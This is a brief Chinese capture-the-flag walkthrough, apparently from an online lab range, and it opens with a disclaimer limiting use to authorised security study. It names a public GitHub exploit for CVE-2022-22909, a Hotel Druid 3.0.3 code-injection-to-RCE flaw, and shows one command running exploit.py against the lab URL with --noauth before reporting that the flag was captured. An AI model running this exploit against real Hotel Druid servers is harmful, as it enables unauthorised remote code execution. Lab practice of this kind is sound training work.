声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
前期准备工具
GitHub - 0z09e/CVE-2022-22909: Hotel Druid 3.0.3 Code Injection to Remote Code Execution
靶场地址
http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com
应用程序没有身份验证。运用该–noauth标志不履行身份验证。
python exploit.py -t http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com/ --noauth
读取flag
成功获取flag